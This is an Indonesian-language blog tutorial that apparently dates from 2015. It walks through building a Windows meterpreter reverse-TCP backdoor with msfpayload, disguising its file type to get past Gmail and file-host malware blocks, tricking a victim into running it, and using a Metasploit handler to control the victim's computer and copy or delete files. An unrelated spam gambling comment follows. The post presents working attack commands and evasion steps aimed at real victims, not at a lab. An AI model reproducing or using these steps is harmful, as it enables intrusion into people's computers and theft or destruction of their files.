Pages

Tuesday, October 13, 2015

Membuka Backdoor Menggunakan BackTrack



Membuka Backdoor Menggunakan BackTrack

Pada tulisan ini, saya akan mencoba membuat sebuah backdoor menggunakan bantuan metasploit yang terdapat pada paket distribusi backtrack. Tulisan ini tidak mendiskritkan mengenai kelemahan sebuah OS, setiap OS memiliki kelemahan masing-masing, begitu juga dengan Linux. Linux masih mungkin di eksploitasi sama dengan Windows, akan tetapi menggunakan metoda yang berbeda.
Langkah pertama yang perlu dilakukan untuk memasang backdoor pada target windows 7 adalah membuat file tersebut terlebih dahulu. Cara membuat file nya pun tergolong mudah.  cukup mengetikkan perintah di bawah ini pada terminal back track anda.
msfpayload windows/meterpreter/reverse_tcp LHOST=[IP Attacker] LPORT=[Port] x > /folderpenyimpanan/namafile.ekstensi
contoh :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.28.2 LPORT=4444 x > /root/Desktop/Downloader.exe

File backdoor yang dibuat oleh metasploit tersebut akan tersimpan pada Desktop backtrack. Hal ini sesuai dengan media penyimpanan yang dipilih sebelumnya. Setelah file tersebut terbentuk, untuk mendistribusikannya, bisa menggunakan beberapa cara, bisa dengan bypass langsung/serang langsung pada target atau menggunakan teknik soceng terhadap korban. Untuk mendistribusikan dengan teknik soceng, attacker cukup mengupload file backdoor di internet atau bisa mengirimkan file tersebut kepada korban.
Gambar diatas merupakan screenshot dari percobaan mengirimkan file backdoor menggunakan e-mail. Dalam percobaan diatas, saya menggunakan layanan gmail untuk mendistribusikannya, akan tetapi gmail mem-block aksi yang dilakukan karena terindikasi file tersebut mengandung virus/malware. Untuk mengakali hal tersebut sangat mudah, bisa dengan melakukan compile ulang terhadap prgoram (cracking program) atau dengan cara sederhana merubah tipe data file tersebut dari exe menjadi sebuah file. Kali ini saya akan memilih opsi yang lebih cepat dengan merubah tipe data file dan mencoba mendistribusikannya kembali
Setelah melakukan perubahan terhadap tipe data file, website file hosting seperti 4shared sudah tidak melakukan block lagi terhadap file backdoor. Sampai pada tahapan ini tugas kita sebagai attacker sudah selesai dilakukan. Tinggal bagaimana cara mendsitribusikan file tersebut. Saya asumsikan disini, attacker berhasil mempengaruhi korban untuk mendownload file tersebut, dan merubah kembali tipe data file menjadi file executable.
Sampai tahap ini, berarti proses menanam backdooring sudah sampai 60 persen, attacker tinggal menunggu korban mengeksekusi file tersebut dan mengaktifkan eksploitasi pada komputer attacker. Untuk mengaktifkan eksploit sendiri dapat mengetikkan perintah dibawah ini pada software eksploitasi metasploit
msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST [IP Attacker]
msf exploit (handler) > exploit
contoh
msf exploit (handler) > use /exploit/multi/handler
msf exploit (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit (handler) > set LHOST 192.168.28.2
msf exploit (handler) > exploit
apabila metasploit sudah memberikan respon seperti diatas, berarti attacker sudah siap melakukan keseluruhan persiapan dan tinggal menunggu file backdoor dijalankan oleh client. Apabila file tersebut sudah dijalankan oleh client, maka metasploit akan memberikan respon seperti gambar dibawah ini
Apabila sampai tahapan ini berhasil dilakukan, berarti kita berhasil menanam backdoor dan bisa mengontrol komputer korban. Kita bisa memindahkan file, meng-copy file dari komputer korban bahkan menghapus file tersebut. Untuk memastikan apakah komputer yang kita susupi memang komputer korban dapat mengetikkan perintah sysinfo dan perintah shell untuk masuk kedalam terminal CMD korban. Berikut ditampilkan contoh penulisan dan gambar hasil proses
Apabila sudah sesuai dengan properties dari komputer korban, berarti backdoor berhasil ditanam dan misi sudah berhasil dilakukan. Untuk memastikan apakah benar-benar bisa melakukan proses penulisan file, pengopyan file bahkan penghapusan file silahkan langsung melakukannya pada terminal yang ada. Contoh kali ini saya akan mencoba membuat sebuah folder yang bernama test_backdooring pada desktop korban
sampai tahapan ini berarti proses telah selesai dilakukan, tergantung kreatifitas attacker untuk memanfaatkan komputer tersebut.

1 comment:

Anonymous said...

10 best betting sites UK that accept bitcoins in 2021
The best betting sites in the UK are the likes of William Hill and Betfred, 토토사이트 while Bet365 and Ladbrokes also offer different sports to bet on. In general,